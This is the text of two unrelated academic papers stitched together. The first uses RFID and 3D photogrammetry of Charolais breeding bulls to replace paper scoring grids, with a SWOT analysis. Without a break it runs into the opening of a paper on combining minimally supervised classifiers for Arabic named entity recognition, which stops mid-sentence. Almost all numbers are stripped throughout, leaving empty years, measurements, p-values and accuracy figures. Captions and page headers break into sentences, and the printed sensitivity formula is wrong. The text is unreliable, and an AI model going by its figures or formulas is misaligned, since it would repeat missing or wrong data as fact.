traits. in , nkrumah and coworkers correlated genetic and phenotypic behaviour based on economically relevant traits (ert) in angus and charolaise breeds, including feed intake, feed conversion ratio, fertility and temperament as those with a direct impact on the management and sustainability of the beef cattle farming system. the genetic value of animals is meant to spread to the whole herd since the productivity and sustainability of the farm does not rely on the single individual. in view of this aspect, the very accurate selection of breeding bulls and cows by the farmer is carried out to optimise production performance, which represents the main economic driver of beef cattle herds. in light of recent research conducted worldwide and of the ever more sophisticated genomic techniques, the latest achievements by genetic investigations on beef cattle (burrow & dillon, ; voisinet et al., ; gibb et al., ; sowell et al., ; burrow & corbet, ; schwartzkopf-genswein, atwood & mcallister, ; robinson & oddy, ; nkrumah et al., ; moore, mrode & coffey, su et al., ; leal et al., ; fonseca et al., ; soulat et al., ) outline the need to obtain very specialized morphological lines of animals, with typical body measurements and breed conformation. several breeds of genetically selected beef cattle are acknowledged worldwide to be of elevated performance, and the charolaise breed is one of these. this cattle breed originated in bourgogne (france) and is characterized by the high quality of meat and acclimation characteristics (briggs & briggs, ). nowadays, charolaise beef cattle can be considered cosmopolite farm animals for meat production, along with some other breeds acknowledged worldwide to be selected for highly specialized traits. in italy, the association of charolaise and limousine farmers (a.n.a.c.l.i.) was founded in with the creation of breed registry records at national level. the presence of the charolaise breed in italy is considerable and the sardinia region contributes considerably to italian cappai et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. beef meat production in terms of the number of heads raised ( , charolaise heads; source a.n.a.c.l.i.: http://www.anacli.it/website/index.php?&pagid= &sessione=). breeding bulls are selected by the farmer according to the type of herd and management. the most common type belongs to the ‘‘souche bouchér’’ line for the production of offspring with high live weight at birth and rapid skeletal and muscular development. heifers or steers are normally slaughtered at an age of – months and weight to slaughter of about kg. the economic value of the breeding bull is strongly influenced by the morphological evaluation carried out in regional and national fairs for livestock, in which animals are scored by breed experts. as recently evaluated in a bio-economic model by leal et al. ( ), the dressing percentage, associated with carcass weight at slaughter and relative yield, in angus cattle is that with the largest economic value within herd productions. this concept may be applied to all beef cattle breeds. it is important to underline that while advanced omic technologies have been used for decades in livestock sciences with particular regard to cattle, the evaluation of morphology through the scoring system of animals still conserves old-fashioned methods. the score attributed to the morphology of the breeding bull has an impact on the economic value of the animal and its progeny and increases the visibility of the farmer, who selects and raises animals for competitions. at present, different morphological sections are scored through an evaluation grid displaying a d schematic illustration of the generic bovine (fig. ). the score sheet reported in fig. displays the official scoring system adopted by the a.n.a.c.l.i. ( ). breed experts judge animals in annual competitions on the basis of a semi-quantitative evaluation, based on the harmonic proportions of animal development, the morphology of anatomical districts and functional traits with direct impact on carcass composition. to a great extent, the overall evaluation is based on the experience of the breed evaluator and is carried out by classifying the animal according to: ( ) muscular condition; ( ) skeletal development; ( ) functional traits; ( ) breed specific traits. at present, this system appears to be technologically outdated if compared with the advanced technologies underlying the achievements of modern breed traits. in view of this gap, smart technologies largely adopted in the beef cattle sector (such as rfid, omic sciences, artificial insemination) have great potential for system improvement, as these may provide valid tools to implement the process for the evaluation of the breeding bull in a modern system. against this backdrop, the goal of a competitive strategy relies on profitable and sustainable productions with regard to external competition (environmental or extrinsic competition) to strengthen the competitive internal advantages. precision livestock farming (plf) has entered livestock farms relatively recently. the efficiency of management was to be improved by way of smart technologies in terms of several aspects of the everyday breeding practices of food producing animals (banhazi et al., ; berckmans, ; fournel, rousseau & laberge, ), particularly of cattle. it was hypothesized that the contactless, real time and digitalized recording of animal data could be the starting point to both internal and external competitive evaluation of the charolaise breeding bull. in particular, d imaging is a technology that is widely deployed in several sectors. in livestock, the deployment of the technology based on d digital imaging is in cappai et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.anacli.it/website/index.php?&pagid= &sessione= http://dx.doi.org/ . /peerj-cs. figure actual d grid used for morphology scoring in beef cattle. the scheme displays both somato- metric measures and confomation scoring of beef cattle. adapted from a.n.a.c.l.i. (http://www. anacli.it/website/index.php?&pagid= &sessione=). full-size doi: . /peerjcs. /fig- its infancy and the few papers on this topic testify to the cutting edge research exploring this new frontier of plf (wu et al., ; kosgro, ; d’eath et al., ). this paper describes an innovative and technological method that was explored to assess the potential of the integration of rfid for animal identification with d images of the real bull for the evaluation of the charolaise breeding bull. this research was undertaken with the aim of: (a) carrying out a swot analysis to identify the strengths, weaknesses, opportunities and threats of traditional vs. innovative cappai et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.anacli.it/website/index.php?&pagid= &sessione= http://www.anacli.it/website/index.php?&pagid= &sessione= https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. processes of morphology evaluation; (b) testing the opportunity offered by the d digital model of the real animal in comparison to the d grid of the scoring system based on biometric measures in the perspective of a digital archive creation for e-commerce. material and methods animal care and identification the animals involved in this study were cared for according to european union legislation on animal protection and welfare (eu reg / /eu). the trial involved two charolaise bulls from the same farm which were and years old, multi-champions of breed and category both at regional and national level. the two bulls enrolled in the trial possess high morphological and genetic value and serve as breeders for all the cows raised on the same farm (total heads raised excluding calves = ). in addition, their semen is also sold for artificial insemination (ai) on other farms. bulls on one farm can also serve several other farms, thus the impact on offspring is multiplied for the desirable traits that farmers intend to introduce to their own herd. raising too many breeding bulls in the same herd would not be economically viable because ai can provide high profits with few, but highly selected animals. the choice to involve these two breeding bulls was therefore driven by conventional farm management practices on one hand and by their morphological value on the other. each bull was electronically identified with an endoruminal bolus ( g. × mm rumitag bolus r©) holding a passive hdx transponder (radio frequency . khz, . × . mm, iso - tiris mm), on voluntary basis. in compliance with current european mandatory rules (eu reg / ) for the individual identification of cattle, the bulls were also identified with double plastic eartags. in vivo body measuring of the animals both bulls (body weight between . and . tons) were individually handled in two distinct moments and temporarily placed in a paddock with a flat concrete floor to allow the recording of body measurements. wither’s height, trunk length and distance at thighs were taken with the lydtin stick, on repeated measures until reaching the same value for three replicates. in this regard, it is necessary to highlight that, while stressful condition were kept to a minimum and the animals were familiar with the facilities and personnel, any sudden movement of the bull may require several repetitions to measure one single parameter until a repeatable and acceptable value could be safely achieved. all measurements were recorded and used to calculate sensitivity and accuracy of in vivo vs. d model measurements. in field image capturing the acquisition of d digital pictures of the animal was carried out in a geo-referenced system (fig. ), where the bull stood in the centre of a circle (r = m) purposely drawn on the floor, in an area outside the barn, in natural daylight but in the shade of a shelter. the operator captured images with a digital camera integrated in a mobile phone ( mpx, focus length . mm, exposure / ) and moved along the circumference where reference cappai et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure geo-referenced ◦—image capture system in farm. the operator captured multiple conse- quent images with an overlap of at least %, moving around the bull that stood in the center of the circle. full-size doi: . /peerjcs. /fig- points of known dimensions were located. the choice to use an integrated camera in a mobile phone was made to test whether a device that is easily available could be suitable for this purpose. the number of pictures taken from the different angles was determined on replicates until reaching the least frame capturing to obtain the best d textured model. the overlap extent of sequential images taken along the circumference was no less than %. post acquisition processing the sets of images were elaborated with agisoft photoscan (agisoft llc c©, russia) software, capable of performing photogrammetric processing of digital images and cappai et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure series of masks generated from the chunks to eliminate background unnecessary objects. full-size doi: . /peerjcs. /fig- figure results from the dense point cloud of the charolaise bull. full-size doi: . /peerjcs. /fig- generating d spatial data, with the algorithm based on structure from motion (sfm). through different consecutive steps starting from the chunk (the original digital image), the relative set of masks is created with the purpose of eliminating objects (masking the unnecessary objects of the picture) from the background (fig. ). the pictures are then aligned and a dense point cloud is generated (fig. ). through the mesh of dense point clouds, the software finalizes the procedure through texturing and builds up the so called ‘‘doll’’ model, from which the d model can be exported into different digital formats. cappai et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table scheme of the swot analysis carried out on the basis of intrinsic and extrinsic factors of the innovation of process for charolaise bull morphology valorization. swot analysis intrinsic factors strenghts weakness opportunities development of strategies to increase opportunities minimization of threats to improve opportunitiesextrinsic factors threats exploit strengths to reduce threats planning of strategies of defense to reduce threats swot analysis of the process “as is” vs. “to be” the bottom-up analysis of strengths, weaknesses, opportunities and threats was based on the potential of the introduction of the d image technology compared with the current scoring system for the beef bull. • definition of objectives • identification of users’ needs • strategies to enhance value • definition and improvement of services swot analysis is based on intrinsic and extrinsic factors of the process that were analyzed as reported in table . in this context, the opportunity offered by electronic identification was explored in the perspective of the creation of a virtual database where d images of bulls could be uploaded with the individual electronic identification code and the farm of origin. the implementation of the system with the introduction of such a new technological tool within the process would contribute to identifying the objectives to satisfy the concept expressed by guatri ( ), according to whom the final goal of business relies on the capability of continuous auto-regeneration over time, with the sustainable creation of economic value. in the light of the evaluation of the system ‘‘as is’’ (based on the current d evaluation score) and ‘‘to be’’ (after the development of the d model for digital archiving and digital data sharing) swot analysis was conducted to explore the introduction of d innovations to instrumental management for the evaluation of the breeding bull. this evaluation therefore focused on the specific extrinsic and intrinsic factors of the evaluation process to test whether the reduction of the technological gap on the farm (bottom) offers opportunities for and/or poses threats to the creation of economic value for farmers and, potentially, for stakeholders (scale-up). calculations, data analysis and statistics a series of measurements for wither’s height, body length and rear trimness was carried out in vivo on each bull and on the respective d virtual model, until reaching the same value for three replicates. the positive predictive value (ppv), sensitivity (or true positive rate, tpr), specificity (or true negative rate, tnr) and accuracy (acc) of the biometric measurements determined cappai et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure body measure taken on the d-bull model. sequence of the topline (a), wither’s height (b) and rear trimness (c). full-size doi: . /peerjcs. /fig- on the d model in comparison with those retrieved from the real animal were calculated using the following formulas: ppv = tp (tp+fp) × ; tpr= tp (fp+tn ) × ; tnr= tn (fp+tn ) × ; acc = (tp+tn ) (tp+tn +fp+fn ) × , where tp is the number of virtual measurements matching with real measurements, fp is the number of different virtual measurements matching with real measurements, tn is the number of different virtual measurements differing from the real measurements, fn is the number of virtual measurements differing from real measurements. the analysis of variance between means of the two series of measurements collected in vivo and on the d virtual model was carried out by anova with sas . (sas inst. inc. cary, nc). results were considered statistically significant when p < . . results the least frame capturing required images in this trial, with an at least % overlap between subsequent pictures on a ◦ total capturing per bull. the operator moved around the animal in the geo-referenced system which allowed body proportions to be established. the process of image capturing took between ′ and ′ per bull. somatic measurements collected in vivo and on the d-bull (fig. ) did not differ in a significant way. when comparing the two systems for taking somatic measurements the fact that no statistical significance between in vivo and virtual values was detected appeared highly cappai et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table body measures of the live animal and respective d model. in vivo and virtual values are re- ported as means and pooled-sd, express in meter. statistic significance is set for p-value < . . body measures (m) in vivo virtual pooled-sd p-value topline . . . . wither height . . . . rear trimness . . . . performance of the d bull tpr % tnr % ppv % accuracy % table scheme of the swot analysis emerged from the analysis of the process for charolais bull morphology valorization. swot analysis valorization of charolais breeding bull morhology strengths weaknesses intrinsic factors •competitiveness of bull genetic value • experienced farmers • worldwide market • ai diffused for semen trade • high dressing % of progeny • restrictions of animal movement • costs of transport • stressful conditions • technology delay opportunities threats extrinsic factors • visibility of bull morphology • generational change • automation of operations • limited investment to update the system • virtual net of buyers/suppliers • e-commerce potentials • aging population • ethical trends on animal product consumption • old fashioned scoring system • climate change • standardization of the system • infectious disease encouraging for the adoption of the system in the field. table summarizes the results on d bull performance. in table , results from the swot analysis are reported. on the basis of the series of measurements carried out both in vivo and on the d bull, the positive predictive value and the accuracy of the system turned out to range from % to % for the three sets of body measurements for wither’s height, body length and rear trimness. discussion the opportunity offered by d digital imaging to carry out body measurements on a d-bull model improves the current system of morphological scoring considerably by objectifying evaluations. indeed, the d grid with a schematic illustration of the generic bovine has to be filled in manually and does not allow any automation. on the other hand, the d bull is a faithful reproduction of the live animal, and is hence highly suitable for the morphological evaluation and appraisal of the genetic potential as a breeding bull through the phenotype. cappai et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. among the advantages offered by the d bull model, the collection of body measurements can be carried out in a safe way, much more comfortably for both the breed evaluator and the bull. in fact, fairs and the presence of other bulls during the scoring process may represent a stressful condition for the animal, which may react to the environmental stimuli in unpredictable ways. while expert personnel and animal friendly facilities are provided during fairs, safe conditions for operators and animal protection may be improved by the evaluation of the virtual model. additionally, d digital images of bulls saved in purposely created virtual archives may ease access and the sharing of data among stakeholders. such digital archives can greatly improve the visibility of the genetic (through the individual electronic code for genealogy) and phenotypic (morphological) value of the bull and potentially broaden the horizons of e-commerce if made available to a network of stakeholders. this opportunity opens up a series of considerations connected with different aspects of beef cattle management. when artificial insemination (ai) is used, the opportunity offered by the digital evaluation of bull morphology would allow the creation of a virtual archive for the e-commerce of semen from bulls with a high profile for functional traits. in the swot analysis of the evaluation process of charolaise bull morphology, we identified internal weaknesses in the costs of animal transport and animal welfare issues, both during transportation and exposition in dedicated fairs. in the ‘‘as is’’ process, the farmer must subscribe bulls to dedicated fairs both on regional and national levels, for which economic resources must be set aside to cover travel and subscription costs. in the ‘‘to be’’ process, the farmer will be able to subscribe animals to online virtual fairs, where animal morphology can be accessed by other remote subscribers and stakeholders thanks to the electronic code associated with the d model of the live bull. in this way, internal weaknesses can be minimized. the possibility of having a virtual archive where digital images of animals can be reached by stakeholders means that the animals do not have to be moved from the farm, hence offering substantial savings on travel costs. reducing stress for the animals due to handling and their being loaded onto means of transport to reach unfamiliar settings is in agreement with other efficient solutions proposed by plf (banhazi et al., ; berckmans, ) to optimise breeding and management practices on site. however, as the system is somewhat advanced, some stakeholders may be unready for the technology and this may lead to a delay in the standardization of the d-model based system. electronic identification through the rfid technology represents both a sound and reliable method for animal identification and a very promising system for the implementation of a virtual archive of recorded animals through the electronic digital number of the transponder, as observed in other filiéres (cappai et al., ; cappai et al., ; cappai, rubiu & pinna, ). in the case of the electronically identified d bull, the record was implemented with d virtual images. the d-bull model for morphological evaluation through a scoring system has a series of indirect advantages, related to both animal health and welfare. the evaluation of animal morphology raised on farms can be promoted also when sanitary restrictions to the movement of animals are in force. as an external threat considered in the swot analysis, the presence of infectious diseases may cappai et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. impact negatively on animal movements outside the farm. for instance, in the case of blue tongue positivity in sheep of a given region, cattle movements are also restricted as bovines are a natural reservoir of the virus, despite not being clinically involved. thus, participation in fairs, as well as movement for trading are forbidden, with consequent profit losses. the swot analysis pointed to different opportunities offered by the introduction of the d model for the evaluation of bull morphology oriented to an up-to-date competitive strategy for the sector. in fact, the analysis of the process ‘‘as is’’ and ‘‘to be’’ clearly highlights how the digital d model performance on the basis of the ppv can implement the evaluation system in a smart, contactless and automated way, which is easily shareable and accessible, whereas the d scoring system does not. the threat of external factors may be the most difficult aspect to deal with. so-called red meat consumption may decrease in the future, unless appropriate marketing strategies and adequate public information are prompted. this threat was considered in the swot analysis due to the increasingly aging population and their choice to prefer so-called ‘‘white meat’’ (that of poultry and rabbit). in addition, climate changes may pose the question of environmentally sustainable farming systems, with a potential contraction of meat consumption. finally, ethical movements against animal product consumption may also influence market choices. conclusions the results obtained from testing the feasibility of an innovative and technologically advanced methodological approach based on the implementation of an rifd and d imaging system aimed to provide a general overview of valuable opportunities offered by the upgrade of the current system. the instrumental evaluation of bull morphology of the charolaise breed in a completely digital d image successfully reflects that of the morphology of the live animal. the upgrade into a high-tech system for the evaluation of the breeding bull shows several potential applications as illustrated in the swot analysis leading to the innovation of the process. in perspective, the opportunities offered by such an innovative methodological approach may lead to the scale up of the integrated system based on individual rfid identification along with that of d digital image of the bull. in fact, the model has the potential for virtual archive creation and the experimental approach appears highly encouraging for further work to check scalability to a large number of animals. acknowledgements the authors would like to thank mr. michele filigheddu for his cooperation during fieldwork activities on his farm and for providing basic production data. the authors are also thankful to dr. santino cherchi for his help during the study. the authors express their gratitude to a.n.a.c.l.i. cappai et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. additional information and declarations funding the authors received no funding for this work. competing interests nicola graziano rubiu is the administrator and technical director of nureid. the authors declare there are no competing interests. author contributions • maria grazia cappai conceived and designed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, approved the final draft. • filippo gambella conceived and designed the experiments, contributed reagents/mate- rials/analysis tools, performed the computation work, approved the final draft. • davide piccirilli performed the experiments, prepared figures and/or tables, performed the computation work, approved the final draft. • nicola graziano rubiu analyzed the data, authored or reviewed drafts of the paper, approved the final draft, analysis of process and swot analysis. • corrado dimauro performed the experiments, analyzed the data, approved the final draft. • antonio luigi pazzona contributed reagents/materials/analysis tools, performed the computation work, approved the final draft. • walter pinna contributed reagents/materials/analysis tools, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: database of raw biometric measures from the live animal and the d model are available in the supplemental materials. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references banhazi tm, lehr h, black jl, crabtree h, schofield p, tscharke m, berckmans d. . precision livestock farming: an international review of scientific and commercial aspects. international journal of agricultural and biological engineering ( ): . berckmans d. . precision livestock farming technologies for welfare management in intensive livestock systems. revue scientifique et technique-office international des epizooties ( ): – . cappai et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. briggs hm, briggs dm. . modern breeds of livestock. fourth edition. london: mcmillian. burrow hm, corbet nj. . genetic and environmental factors affecting temperament of zebu and zebu-derived beef cattle grazed at pasture in the tropics. australian journal of agricultural research : – doi . /ar . burrow hm, dillon rd. . relationship between temperament and growth in a feedlot and commercial carcass traits in bos indicus crossbreds. australian journal of experimental agriculture : – doi . /ea . cappai mg, picciau m, nieddu g, bitti mpl, pinna w. . long term performance of rfid technology in the large scale identification of small ruminants through elec- tronic ceramic boluses: implications for animal welfare and regulation compliance. small ruminant research : – doi . /j.smallrumres. . . . cappai mg, rubiu ng, nieddu g, bitti mpl, pinna w. . analysis of fieldwork activities during milk production recording in dairy ewes by means of individual ear tag (et) alone or plus rfid based electronic identification (eid). computers and electronics in agriculture : – doi . /j.compag. . . . cappai mg, rubiu ng, pinna w. . economic assessment of a smart traceability system (rfid+dna) for origin and brand protection of the pork product labelled suinetto di sardegna. computers and electronics in agriculture : – doi . /j.compag. . . . d’eath rb, jack m, futro a, talbot d, zhu q, barclay d, baxter em. . automatic early warning of tail biting in pigs: d cameras can detect lowered tail posture before an outbreak. plos one ( ):e . de souza fonseca pa, id-lahoucine s, reverter a, medrano jf, fortes ms, casellas j, miglior f, brito l, carvalho mrs, schenkel fs, nguyen lt, porto-neto lr, thomas mg, cánovas a. . combining multi-omics information to identify key-regulator genes for pleiotropic effect on fertility and production traits in beef cattle. plos one doi . /journal.pone. . fournel s, rousseau an, laberge b. . rethinking environment control strategy of confined animal housing systems through precision livestock farming. biosystems engineering : – doi . /j.biosystemseng. . . . gibb dj, mcallister ta, huisma c, wiedmeier rd. . bunk attendance of feedlot cattle monitored with radio frequency technology. canadian journal of animal science : – doi . /a - . guatri l. . la teoria di creazione del valore. milano: egea. kosgro j. . estimation of pig weight using a microsoft kinect prototype imaging system. computers and electronics in agriculture : – doi . /j.compag. . . . leal ws, costa rf, cardoso ll, mendonça fs, cardoso ff, yokoo mj, weaber rl. . bio-economic model predicts economic values for beef production. kansas agricultural experiment station research reports : – doi . / - . . cappai et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /ar http://dx.doi.org/ . /ea http://dx.doi.org/ . /j.smallrumres. . . http://dx.doi.org/ . /j.compag. . . http://dx.doi.org/ . /j.compag. . . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /j.biosystemseng. . . http://dx.doi.org/ . /a - http://dx.doi.org/ . /j.compag. . . http://dx.doi.org/ . / - . http://dx.doi.org/ . /peerj-cs. moore kl, mrode r, coffey mp. . genetic parameters of visual image analysis primal cut carcass traits of commercial prime beef slaughter animals. animal ( ): – doi . /s . nkrumah jd, crews jr dh, basarab ja, price ma, okine ek, wang z, li c, moore ss. . genetic and phenotypic relationships of feeding behavior and temperament with performance, feed efficiency, ultrasound, and carcass merit of beef cattle. journal of animal science : – doi . /jas. - . robinson dl, oddy vh. . genetic parameters for feed efficiency, fatness, muscle area and feeding behavior of feedlot finished beef cattle. livestock production science : – doi . /j.livprodsci. . . . schwartzkopf-genswein ks, atwood s, mcallister ta. . use of remote bunk monitoring to record effect of breed, feeding regime and weather on feeding behavior and growth performance of cattle. canadian journal of animal science : – doi . /a - . soulat j, picard b, léger s, monteils v. . prediction of beef carcass and meat quality traits from factors characterising the rearing management system applied during the whole life of heifers. meat science : – doi . /j.meatsci. . . . sowell bf, bowman jgp, branine me, hubbard me. . radio frequency technology to measure feeding behavior and health of feedlot steers. applied animal behaviour science : – doi . /s - ( ) - . su h, golden b, hyde l, sanders s, garrick d. . genetic parameters for carcass and ultrasound traits in hereford and admixed simmental beef cattle: accu- racy of evaluating carcass traits. journal of animal science ( ): – doi . /jas . . voisinet bd, grandin t, tatum jd, o’connor sf, struthers jj. . feedlot cattle with calm temperaments have higher average daily gains than cattle with excitable temperaments. journal of animal science : – doi . / . x. wu j, tillett r, mcfarlane njb, ju x, siebert jp, schofield . . extracting the three- dimensional shape of live pigs using stereo photogrammetry. computers and electronics in agriculture ( ): – doi . /j.compag. . . . cappai et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s http://dx.doi.org/ . /jas. - http://dx.doi.org/ . /j.livprodsci. . . http://dx.doi.org/ . /a - http://dx.doi.org/ . /j.meatsci. . . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /jas . http://dx.doi.org/ . / . x http://dx.doi.org/ . /j.compag. . . http://dx.doi.org/ . /peerj-cs. combining minimally-supervised methods for arabic named entity recognition maha althobaiti, udo kruschwitz, and massimo poesio school of computer science and electronic engineering university of essex colchester, uk {mjaltha, udo, poesio}@essex.ac.uk abstract supervised methods can achieve high perfor- mance on nlp tasks, such as named en- tity recognition (ner), but new annotations are required for every new domain and/or genre change. this has motivated research in minimally supervised methods such as semi- supervised learning and distant learning, but neither technique has yet achieved perfor- mance levels comparable to those of super- vised methods. semi-supervised methods tend to have very high precision but compar- atively low recall, whereas distant learning tends to achieve higher recall but lower pre- cision. this complementarity suggests that better results may be obtained by combining the two types of minimally supervised meth- ods. in this paper we present a novel ap- proach to arabic ner using a combination of semi-supervised and distant learning tech- niques. we trained a semi-supervised ner classifier and another one using distant learn- ing techniques, and then combined them using a variety of classifier combination schemes, including the bayesian classifier combina- tion (bcc) procedure recently proposed for sentiment analysis. according to our results, the bcc model leads to an increase in per- formance of percentage points over the best base classifiers. introduction supervised learning techniques are very effective and widely used to solve many nlp problems, in- cluding ner (sekine and others, ; benajiba et al., a; darwish, ). the main disadvantage of supervised techniques, however, is the need for a large annotated corpus. although a considerable amount of annotated data is available for many lan- guages, including arabic (zaghouani, ), chang- ing the domain or expanding the set of classes al- ways requires domain-specific experts and new an- notated data, both of which demand time and effort. therefore, much of the current research on ner focuses on approaches that require minimal human intervention to export the named entity (ne) clas- sifiers to new domains and to expand ne classes (nadeau, ; nothman et al., ). semi-supervised (abney, ) and distant learn- ing approaches (mintz et al., ; nothman et al., ) are alternatives to supervised methods that do not require manually annotated data. these approaches have proved to be effective and easily adaptable to new ne types. however, the perfor- mance of such methods tends to be lower than that achieved with supervised methods (althobaiti et al., ; nadeau, ; nothman et al., ). we propose combining these two minimally su- pervised methods in order to exploit their respective strengths and thereby obtain better results. semi- supervised learning tends to be more precise than distant learning, which in turn leads to higher re- call than semi-supervised learning. in this work, we use various classifier combination schemes to combine the minimal supervision methods. most previous studies have examined classifier combi- nation schemes to combine multiple supervised- learning systems (florian et al., ; saha and ekbal, ), but this research is the first to com- bine minimal supervision approaches. in addition, transactions of the association for computational linguistics, vol. , pp. – , . action editor: ryan mcdonald. submission batch: / ; revision batch / ; published / . c© association for computational linguistics. distributed under a cc-by-nc-sa . license. we report our results from testing the recently pro- posed independent bayesian classifier combination (ibcc) scheme (kim and ghahramani, ; lev- enberg et al., ) and comparing it with traditional voting methods for ensemble combination. background . arabic ner a lot of research has been devoted to arabic ner over the past ten years. much of the initial work em- ployed hand-written rule-based techniques (mesfar, ; shaalan and raza, ; elsebai et al., ). more recent approaches to arabic ner are based on supervised learning techniques. the most common supervised learning techniques investigated for ara- bic ner are maximum entropy (me) (benajiba et al., b), support vector machines (svms) (be- najiba et al., ), and conditional random fields (crfs) (benajiba and rosso, ; abdul-hamid and darwish, ). darwish ( ) presented cross-lingual features for ner that make use of the linguistic properties and knowledge bases of another language. in his study, english capitalisation features and an english knowledge base (dbpedia) were exploited as dis- criminative features for arabic ner. a large ma- chine translation (mt) phrase table and wikipedia cross-lingual links were used for translation between arabic and english. the results showed an overall f-score of . % with an improvement of . % over a strong baseline system on a standard dataset (the anercorp set collected by benajiba et al. ( a)). abdallah et al. ( ) proposed a hybrid ner system for arabic that integrates a rule-based sys- tem with a decision tree classifier. their inte- grated approach increased the f-score by between % and % when compared to the original rule based system and the pure machine learning tech- nique. oudah and shaalan ( ) also developed hybrid arabic ner systems that integrate a rule- based approach with three different supervised tech- niques: decision trees, svms, and logistic regres- sion. their best hybrid system outperforms state-of- the-art arabic ner systems (benajiba and rosso, ; abdallah et al., ) on standard test sets. . minimal supervision and ner much current research seeks adequate alternatives to expensive corpus annotation that address the limita- tions of supervised learning methods: the need for substantial human intervention and the limited num- ber of ne classes that can be handled by the system. semi-supervised techniques and distant learning are examples of methods that require minimal supervi- sion. semi-supervised learning (ssl) (abney, ) has been used for various nlp tasks, including ner (nadeau, ). ‘bootstrapping’ is the most com- mon semi-supervised technique. bootstrapping in- volves a small degree of supervision, such as a set of seeds, to initiate the learning process (nadeau and sekine, ). an early study that introduced mutual bootstrapping and proved highly influential is (riloff and jones, ). they presented an al- gorithm that begins with a set of seed examples of a particular entity type. then, all contexts found around these seeds in a large corpus are compiled, ranked, and used to find new examples. pasca et al. ( ) used the same bootstrapping technique as riloff and jones ( ), but applied the technique to very large corpora and managed to generate one million facts with a precision rate of about %. ab- delrahman et al. ( ) proposed to integrate boot- strapping semi-supervised pattern recognition and a conditional random fields (crfs) classifier. they used semi-supervised pattern recognition in order to generate patterns that were then used as features in the crfs classifier. distant learning (dl) is another popular paradigm that avoids the high cost of supervision. it depends on the use of external knowledge (e.g., encyclopedias such as wikipedia, unlabelled large corpora, or external semantic repositories) to increase the performance of the classifier, or to automatically create new resources for use in the learning process (mintz et al., ; nguyen and moschitti, ). nothman et al. ( ) automatically created massive, multilingual training annotations for ner by exploiting the text and in- ternal structure of wikipedia. they first categorised wikipedia articles into a specific set of named entity types across nine languages: dutch, english, french, german, italian, polish, portuguese, rus- sian, and spanish. then, wikipedia’s links were transformed into named entity annotations based on the ne types of the target articles. following this approach, millions of words were annotated in the aforementioned nine languages. their method for automatically deriving corpora from wikipedia outperformed the methods proposed by richman and schone ( ) and mika et al. ( ) when testing the wikipedia-trained models on conll shared task data and other gold-standard corpora. alotaibi and lee ( ) presented a methodology to automatically build two ne-annotated sets from arabic wikipedia. the corpora were built by transforming links into ne annotations according to the ne type of the target articles. pos-tagging, morphological analysis, and linked ne phrases were used to detect other mentions of nes that appear without links in text. their wikipedia-trained model performed well when tested on various newswire test sets, but it did not surpass the performance of the supervised classifier that is trained and tested on data sets drawn from the same domain. . classifier combination and ner we are not aware of any previous work combin- ing minimally supervised methods for ner task in arabic or any other natural language, but there are many studies that have examined classifier com- bination schemes to combine various supervised- learning systems. florian et al. ( ) presented the best system at the ner conll task, with an f-score value equal to . %. they used a combination of four diverse ne classifiers: the transformation-based learning classifier, a hidden markov model classifier (hmm), a robust risk min- imization classifier based on a regularized winnow method (zhang et al., ), and a me classifier. the features they used included tokens, pos and chunk tags, affixes, gazetteers, and the output of two other ne classifiers trained on richer datasets. their methods for combining the results of the four ne classifiers improved the overall performance by - % when compared with the best performing clas- sifier. saha and ekbal ( ) studied classifier combi- nation techniques for various ner models under single and multi-objective optimisation frameworks. they used seven diverse classifiers - naive bayes, decision tree, memory based learner, hmm, me, crfs, and svms - to build a number of voting mod- els based on identified text features that are selected mostly without domain knowledge. the combina- tion methods used were binary and real vote-based ensembles. they reported that the proposed multi- objective optimisation classifier ensemble with real voting outperforms the individual classifiers, the three baseline ensembles, and the corresponding sin- gle objective classifier ensemble. two minimally supervised ner classifiers two main minimally supervised approaches have been used for ner: semi-supervised learning (al- thobaiti et al., ) and distant supervision (noth- man et al., ). we developed state-of-the-art classifiers of both types that will be used as base classifiers in this paper. our implementations of these classifiers are explained in section . and section . . . semi-supervised learning as previously mentioned, the most common ssl technique is bootstrapping, which only requires a set of seeds to initiate the learning process. we used an algorithm adapted from althobaiti et al. ( ) and contains three components, as shown in figure . pattern induction instance extraction instance ranking/selection seed instances figure : the three components of ssl system. the algorithm begins with a list of a few exam- ples of a given ne type (e.g., ‘london’ and ‘paris’ can be used as seed examples for location entities) and learns patterns (p) that are used to find more ex- amples (candidate nes). these examples are even- tually sorted and used again as seed examples for the next iteration. our algorithm does not use plain frequencies since absolute frequency does not always produce good examples. this is because bad examples will be extracted by one pattern, however unwantedly, as many times as the bad examples appear in the text in relatively similar contexts. meanwhile, good exam- ples are best extracted using more than one pattern, since they occur in a wider variety of contexts in the 